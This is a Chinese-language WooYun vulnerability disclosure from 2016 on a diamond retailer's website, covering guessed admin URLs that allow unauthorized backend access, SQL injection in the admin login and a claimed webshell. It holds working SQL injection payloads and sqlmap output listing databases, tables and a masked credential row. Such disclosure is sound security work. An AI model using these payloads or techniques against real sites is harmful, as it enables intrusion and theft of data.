当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170258

漏洞标题:金伯利钻石未授权访问/sql注入打包/getshell

相关厂商:金伯利钻石官网

漏洞作者: __Lee_

提交时间:2016-01-16 15:56

修复时间:2016-03-06 11:26

公开时间:2016-03-06 11:26

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-16: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-19: 细节向实习白帽子公开
2016-03-06: 细节向公众公开

简要描述:

金伯利钻石未授权访问/sql注入打包/getshell

详细说明:

金伯利钻石官网奇葩姿势进后台,敏感地址泄露,未授权访问(附送后台登录处sql注入)
#1
http://**.**.**.**/index.php?r=site/detail&pid=307
这是一个普通的页面,看到地址有点奇怪,于是访问:
http://**.**.**.**/index.php?r=site/detail
奇葩的一幕出现了:

detail.jpg


根据网站的地址定义规则尝试了一下:
http://**.**.**.**/index.php?r=site/manage

manage.jpg


http://**.**.**.**/index.php?r=site/main

main.jpg


直接进入后台页面 - -!

漏洞证明:

如上,附送后台登录页面sql注入(因为后台是在手工注入的时候一不小心就进去了- -!所以打包)
http://**.**.**.**:80/index.php?r=site/bg-login (POST)

houtai1.jpg


直接报错

houtai2.jpg


敏感信息

houtai3.jpg


SQLMAP

sql.jpg


金伯利钻石官网SQL注入
http://**.**.**.**:80/index.php?r=site/bg-login (POST)

sqlmap identified the following injection point(s) with a total of 220 HTTP(s) requests:
---
Parameter: account (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: account=-1898' OR 8667=8667#&pwd=1
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: account=1' UNION ALL SELECT NULL,CONCAT(0x716b7a6271,0x67416d50437a754e76587a6964534171626e5750464359567249715959796b5357464a5343775946,0x7162627071),NULL,NULL#&pwd=1
---
web application technology: PHP 5.6.15, Nginx
back-end DBMS: MySQL >= 5.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: account (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: account=-1898' OR 8667=8667#&pwd=1
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: account=1' UNION ALL SELECT NULL,CONCAT(0x716b7a6271,0x67416d50437a754e76587a6964534171626e5750464359567249715959796b5357464a5343775946,0x7162627071),NULL,NULL#&pwd=1
---
web application technology: PHP 5.6.15, Nginx
back-end DBMS: MySQL 5
available databases [7]:
[*] information_schema
[*] kella
[*] kim
[*] kimberlite
[*] mysql
[*] performance_schema
[*] test
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: account (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: account=-1898' OR 8667=8667#&pwd=1
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: account=1' UNION ALL SELECT NULL,CONCAT(0x716b7a6271,0x67416d50437a754e76587a6964534171626e5750464359567249715959796b5357464a5343775946,0x7162627071),NULL,NULL#&pwd=1
---
web application technology: PHP 5.6.15, Nginx
back-end DBMS: MySQL 5
Database: kim
[26 tables]
+------------------+
| join |
| user |
| application |
| brand |
| caption |
| classic |
| classic_list |
| config |
| desginer |
| desginer_list |
| huodong |
| images |
| jiamengshang |
| jm |
| kd_list |
| member |
| new_push |
| news |
| picture |
| product |
| product_categroy |
| product_type |
| source |
| sqlmapoutput |
| story_video |
| zuanshi |
+------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: account (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: account=-1898' OR 8667=8667#&pwd=1
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: account=1' UNION ALL SELECT NULL,CONCAT(0x716b7a6271,0x67416d50437a754e76587a6964534171626e5750464359567249715959796b5357464a5343775946,0x7162627071),NULL,NULL#&pwd=1
---
web application technology: PHP 5.6.15, Nginx
back-end DBMS: MySQL 5
Database: kim
Table: user
[1 entry]
+------------+------------+
| account | pwd |
+------------+------------+
| kim******* | kim******* |
+------------+------------+


注出账号密码,进入后台
#2 getshell

getshell.jpg


shell.jpg


cmd.jpg


修复方案:

过滤!验证!

版权声明:转载请注明来源 __Lee_@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-20 10:14

厂商回复:

CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无